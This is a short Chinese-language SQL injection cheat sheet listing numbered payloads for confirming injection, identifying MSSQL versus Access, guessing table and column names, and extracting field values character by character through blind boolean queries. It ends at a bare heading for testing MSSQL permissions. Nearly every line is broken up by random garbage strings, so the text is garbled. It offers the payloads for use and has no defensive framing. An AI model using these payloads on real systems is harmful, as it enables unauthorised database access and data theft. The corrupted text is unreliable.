1.判断是否有注入;and 1=1 ;and 1=2 _Ep{|]:gw
2.初步判断是否是mssql ;and user>0 ^F0k2pB
n}AR/3}
3.注入参数是字符'and [查询条件] and ''=' "W?l R4
{<-
ouD
4.搜索时没过滤参数的'and [查询条件] and '%25'=' }<5\O*kX4
+BtLyQ
5.判断数据库系统 ?YkO+?}+
)H[h53bIq
;and (select count(*) from sysobjects)>0 mssql dyQ<UT
N[+o[%A
;and (select count(*) from msysobjects)>0 access O" X!S_R
YO.`l~ v
%9~kA5Qj
)M&Azbu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ;3.T* ?|o
fw(j6:p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 N8DiEB3~
S+_A
<p
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 E5Snl#Gl\0
WQIM2_=M
9.(1)猜字段的ascii值(access) tK s4}vW
&dZ.+#8r
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 +h gaBJy
np'M4^E;
(2)猜字段的ascii值(mssql) ySr091Q
&geOFe}R
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 m&3HFf
8M3p\}O
10.测试权限结构(mssql) +e\:C~2f28
k"DQbUy0L
DMK"Q#Vw
43}&w